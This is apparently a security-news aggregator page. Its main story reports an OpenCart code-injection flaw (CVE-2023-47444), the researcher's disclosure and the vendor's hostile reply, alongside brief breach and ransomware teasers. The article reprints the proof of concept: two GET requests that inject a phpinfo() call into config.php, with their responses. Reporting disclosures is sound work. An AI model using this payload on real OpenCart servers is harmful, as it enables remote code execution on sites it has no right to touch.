Louisiana and Oregon warn that millions of driver’s licenses were exposed in a data breach after a ransomware gang hacked their MOVEit Transfer security file transfer systems to steal stored data. […] Read More
BleepingComputer
Related Posts
Researcher Discloses OpenCart Vulnerability; Company Reacts Aggressively
Researcher Discloses OpenCart Vulnerability; Company Reacts Aggressively
A security researcher who goes under the name “0xbro” discovered a Static code injection vulnerability in OpenCart, which allows the writing of arbitrary untrusted data on config.php and admin/config.php files that could result in remote code execution.
This vulnerability was assigned CVE-2023-47444, and the severity was 8.8 (High).
However, a responsible disclosure was made from the security researcher to OpenCart, which was not responded to politely. The administrator, who goes by the name Daniel Kerr, responded to his report saying, “ur a f**kng tim.e waster“.
CVE-2023-47444: Authenticated Static Code Injections in OpenCart
This vulnerability exists in OpenCart versions 4.0.0.0 to 4.0.2.3, which allows an authenticated user with common/security “access” and “modify” privileges to write untrusted arbitrary data to the config.php and admin/config.php which could result in remote code execution.
This vulnerability existed on two functions, one of which moves the storage folder outside the application web root and another that renames the secret admin path after the installation.
Document
Free Webinar
Live API Attack Simulation Webinar
In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway
Prerequisites and Proof of Concept
In order to exploit this vulnerability, the threat actor must possess valid credentials to the backend dashboard along with written permission on the common/security. In addition to this, the admin/ folder must be a default one and not renamed.
Proof-of-concept (Source: 0xbro)
As per the proof-of-concept for this vulnerability, the requests must be sent in two directions.
route=common/security.storage&name=pwned’);phpinfo();%23&path=<opencart_base_folder>&user_token=<user_token>
route=common/security.storage&name=pwned’);phpinfo();%23&path=<opencart_base_folder>&user_token=<user_token>&page=99
First Request
GET /admin_secret/index.php?route=common/security.storage&name=pwned’);phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1Host: 127.0.0.1:8888Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
— RESPONSE —
HTTP/1.1 200 OK
{“next”:”http://127.0.0.1:8888/admin_secret/index.php?route=common/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned’);phpinfo();#&path=/home/kali/Projects/OpenCart/4.0.2.3/&page=2″}
Second Request
GET /admin_secret/index.php?route=common/security.storage&name=pwned’);phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1Host: 127.0.0.1:8888Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
— RESPONSE —
HTTP/1.1 200 OK
{“success”:”Success: Storage directory has been moved!”}
Adding to the response from OpenCart, the administrators also closed the pull request on GitHub, mentioning it as a “non-vulnerability”. However, the fix was later merged into the master.
A complete report about this vulnerability and the OpenCart response has been published, providing detailed information on the proof-of-concept and other information.
Experience how StorageGuard eliminates the security blind spots in your storage systems by trying a 14-day free trial.
The post Researcher Discloses OpenCart Vulnerability; Company Reacts Aggressively appeared first on Cyber Security News.
Cyber Security News
What your digital wallet says about you. Ransomware at Mom’s Meals data.
What your digital wallet says about you. Ransomware at Mom’s Meals data.
What your digital wallet says about you. Ransomware attackers gobble up Mom’s Meals data. Read More
The CyberWire
The pros and cons of an independent cyber force. California passes bill aimed at reigning in data brokers.
The pros and cons of an independent cyber force. California passes bill aimed at reigning in data brokers.
The pros and cons of an independent cyber force. California passes bill aimed at reigning in data brokers. Read More
The CyberWire